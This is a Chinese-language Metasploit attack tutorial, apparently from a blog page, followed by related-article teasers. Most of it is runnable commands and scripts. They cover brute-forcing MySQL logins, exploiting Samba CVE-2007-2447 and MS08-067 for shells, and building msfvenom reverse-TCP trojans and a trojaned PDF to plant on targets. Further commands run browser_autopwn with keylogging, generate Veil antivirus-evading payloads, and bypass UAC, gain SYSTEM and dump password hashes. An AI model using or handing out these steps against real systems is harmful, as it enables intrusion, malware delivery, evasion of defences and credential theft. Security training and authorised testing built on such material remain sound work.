Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)

article/2025/9/29 11:29:31

1、控制Metasploit终端(MSFCONSOLE)
MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块
一些通用命令:
help:该命令允许用户查看执行命令的帮助信息
use module:该命令允许用户加载选择的模块
set optionname module:该命令允许用户为模块设置不同的选项。
run:该命令用来启动一个非渗透攻击模块
search module:该命令允许用户搜索一个特定的模块
exit:退出MSFCONSOLE
操作步骤:
1)、终端启动MSFCONSOLE
在这里插入图片描述
当出现msf>提示符,表示msfconsole启动成功
2)、使用search命令搜索所有有效的mysql模块
在这里插入图片描述

输出的信息显示为4列:模块名称,公开时间,等级、描述
3)、使用 mysql扫描模块
在这里插入图片描述

4)、显示模块的有效选项
在这里插入图片描述
输出的信息显示为4列:选项名称,当前设置,需求及描述,其中Required为yes的选项是必须配置的,选项的作用在描述中可以了解到
5)、为渗透攻击指定目标系统,用户文件和密码文件配置
根据Required可以看到必须配置但是还未配置的选项有RHOSTS即目标主机IP
在这里插入图片描述
其中选项USER_FILE 和PASS_FILE指定渗透的用户文件和密码文件,类似于爆破中的字典文件
在这里插入图片描述
6)、启动渗透攻击
在这里插入图片描述
测试出用户的名称和密码分别是root和password
2、控制Metasploit命令行接口(MSFCLI:一个接口)
但在2015年以后,Msfconsole中的-x选项代替Msfcli
参考链接
Msfcli is no longer available in Metasploit
操作实例(利用CVE-2007-2447获得linux命令行的shell)Samba MS-RPC Shell命令注入漏洞
编写shell脚本test.sh

#!/bin/bash                 
echo "please set RHOST IP"
read -p "IP:" IP            
msfconsole -x "use multi/samba/usermap_script;\set payload cmd/unix/bind_netcat;\set RHOST $IP;\run"

chmod +x test.sh 给脚本执行权限
./test.sh执行脚本
在这里插入图片描述

得到shell
还可以利用msfconsole命令行得到shell

search CVE-2007-2447

在这里插入图片描述
在这里插入图片描述
利用ms08_067漏洞得到win xp的shell

#!/bin/bash                 
echo "please set RHOST IP"
read -p "IP:" IP            
msfconsole -x "use  exploit/windows/smb/ms08_067_netapi;\set payload windows/meterpreter/reverse_tcp;\set RHOST $IP;\run"

3、控制Meterpreter
通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能返回给用户一个控制通道,当获取目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。msfconsole用于管理用户会话,而Meterpreter则是攻击载荷和渗透攻击交互。
一些常用命令:
help:查看帮助信息
background:允许用户在后台Meterpreter会话
download:允许用户从入侵主机上下载文件
upload:允许用户上传文件到入侵主机
execute:允许用户在入侵主机上执行命令
shell:允许用户在入侵主机(仅是win主机)允许shell 命令
session -i:允许用户切换会话
实例:远程控制windows系统
生成木马文件

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=IP lport=4444  -f exe -o shell.exe 

lhost和lport都设置为本地的ip和监听端口
设法将木马文件拷贝到目标主机,等待目标主机运行程序
使用handler模块

use exploit/multi/handler

设置payload与上述一致
设置lhost和lport
exploit实施监听
当目标主机执行了控制软件之后,将连接到Meterpreter,开启会话,控制win系统(使用的还是linux命令)

4、渗透攻击应用
远程登录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
渗透攻击samba服务
samba是一套实现SMB协议、跨平台进行文件共享和打印共享服务的程序,对应的端口号有139和445,只要开启这个端口后,极可能存在Samba服务远程溢出漏洞
在这里插入图片描述
PDF文件攻击
生成PDF文件

use exploit/windows/fileformat/adobe_cooltype_sing #利用PDF漏洞模块
set payload windows/meterpreter/reverse_tcp #配置攻击载荷
show options
set LHOST 攻击机IP
set FILENAME test.pdf 生成带有木马的PDF文件
exploit

将pdf文件传入攻击主机
实施监听

use multi/handler  #启动监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 攻击机IP
exploit

使用browser_autopwn模块渗透攻击浏览器
只会攻击系统自带的IE 7

search autopwn
use auxiliary/server/browser_autopwn   #使用autopwn模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.132   
set URIPATH "filetypes" #当客户端访问本地主机192.168.52.132:8080/filetypes时将产生活跃的会话
session -i ID #启动会话,将进入Meterpreter命令行
meterpreter>keyscan_start #启动键盘输入

5、捕获包

a、首先要确认获得一个活跃的会话,并且连接到目标主机的meterpreter shell
b、run packetrecorder命令捕获目标系统的数据包,先查看packetrecorder命令参数
c、run packetrecorder -li查看可用的捕获网络接口
d、指定捕获接口开始捕获数据,并将捕获数据保存到桌面上
run packetrecorder -i 1/2… -l /root/Desktop
e、ctrl c停止捕获

6、免杀payload生成工具veil
使用步骤:

a、apt-get install veil #安装veil工具
b、veil-evasion #启动veil工具 ,此过程中初始化一些脚本,软件包列表、更新配置及安装一些软件包(python和pywin32-218、pycrypto-2.6)
c、list #列出可用的攻击载荷
d、use 5 #选择攻击载荷
e、set #配置相关的选项参数
f、info #查看攻击载荷的详细信息
g、generate #生成载荷文件,设法发送到目标主机
h、启动msf终端
i、use exploit/multi/handler #使用handler模块
j、set payload windows/meterpreter/reverse_tcp #加载reverse_tcp攻击载
k、set HOST IP #设置选项参数
l、exploit #启动渗透攻击
m、shell #进入对方的shell 环境

提升权限

a、meterpreter> background #将当前会话调到后台运行
b、sessions #查看会话详细信息
c、use exploit/windows/local/bypassuac #使用bypassuac模块,并查看可配置的选项参数,其中有个参数session
d、set session ID #配置session选项参数,即当前后台运行的会话编号
e、exploit #启动渗透攻击
f、getuid #查看当前用户的信息
g、getsystem #提升权限,之后可以进行任何操作
h、run /post/windows/gather/hashdump #捕获目标系统中用户的密码哈希值


http://chatgpt.dhexx.cn/article/Bx4Uwnvk.shtml

相关文章

Windows上安装Metasploit-(msfconsole)

前言 平时使用metasploit一般是在kali里面,有时候使用非常的麻烦,其实Metasploit也是支持Windows的,关于很多metasploit的方法,作者觉得有点小麻烦,这里给大家带来一种最简单的方法。 任务一 下载metasploit metasplo…

msfconsole之制作windows木马并成功获取shell

msfconsole之制作windows木马并成功获取shell 一、工具简介     msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所…

msfconsole使用手册

我使用ubuntu;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole选择一个漏洞: msf > search platform: windows…

msfvenom msfconsole——msfvenom生成木马入侵WinServer2008及Android手机

文章目录 一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式 三、msfconsole控制感染对象Ⅰ、电脑端示例:shell获取Windows的CMDⅡ、移动端示例:webcam_stream获取Android摄像头实时画面 完 免责声明:本文章仅供网…

kali中安装使用msfconsole

在kali中执行msfconsole,显示没有这个命令 安装metasploit-framework框架 启动数据库 service postgresql start # 启动数据库 初始化msf数据库 启动msfconsole 成功!!!

metasploit中msfconsole使用教程,永恒之蓝漏洞复现

文章目录 前言msfconsole常用参数打开和关闭search 查找模块use 使用指定模块info 查看模块的详细信息show 查看,set设置run 和 exploit mf17-010(永恒之蓝)漏洞复现 前言 msfconsole是metasploit中的一个工具,msfconsole集成了很多漏洞的利用的脚本&am…

msfconsole理论

msfconsole理论 msfconsole理论 ‍‍ 在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习,但是msfconsole真的是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfcon…

msfconsole捆绑木马

捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.0.108 …

msfconsole 控制台使用和操作

Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直…

Msfconsole的基本使用

WIN XP ms12_020 复现 msfconsolesearch 查找模块use 装载模块winxp ip :192.168.186.133set RHOST 设置目标主机run 执行攻击目标蓝屏死机 重启常用命令show exploits 列出metasploit框架中的所有渗透攻击模块show payloads 列出metasploit框架中的所有攻击载荷sh…

metasploit msfconsole 命令参数

在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习,但是msfconsole真的是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有…

使用msfconsole常见问题解决

问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因…

msfconsole的简单使用

文章目录 前言一、入侵步骤ps之后通过学习了解了内网穿透 二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdat…

msfconsole的使用,MSF17-010(虚拟机)的实验

一.介绍永恒之蓝: 二.环境 宿主机kali: IP地址 靶机win7: IP地址 然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通. 三.msfconsole的使用 1.输入命令msfconslole使用msf框架 2.search MSF17-010 搜索相关脚本 …

【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

目录 一、简介: 二、下载: 2.1、kali 2.2、官网: 2.3、GitHub: 三、启动方法 四、msf常用基础命令 五、msf结构 六、 核心命令: 一、简介: 很容易地获取、开发并对计算机软件漏洞实施攻击 附带数百…

kali msfconsole命令详解以及靶机攻破实战

一.msfconsole介绍 msfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种渗透文件,利用网站,手机等的漏洞将到目标靶机,操控目标靶机…这边仅供学习使用 msfconsole注:默认kali 预装了met…

内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)

Msfconsole工具 概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. 目录: Msfconsole的使用: 第一步:进行端…

SSO是什么?CAS是什么?

SSO SSO是目前比较流行的服务于企业业务整合的解决方案之一, SSO 使得在多个应用系统中,用户只需要 登录一次 就可以访问所有相互信任的应用系统。 CAS CAS 是 Yale 大学发起的一个企业级的、开源的项目,旨在为 Web 应用系统提供一种可靠的…

什么是CAS?

CAS 是 Yale (耶鲁)大学发起的一个开源项目,旨在为 Web 应用系统提供一种可靠的单点登录方法,CAS 在 2004 年 12 月正式成为 JA-SIG 的一个项目。CAS 具有以下特点: 【1】开源的企业级单点登录解决方案。 【2】CAS S…

什么是CAS和AQS

什么是CAS和AQS CAS理解概念ABA 问题 AQS理解获取同步状态AQS源码分析获取锁释放锁 CAS是一种乐观锁,通过在修改数据时,通过和原来的值进行比较,判断是否有被其他人改变。然后AQS是有一个对列,当线程获取不到锁的时候,…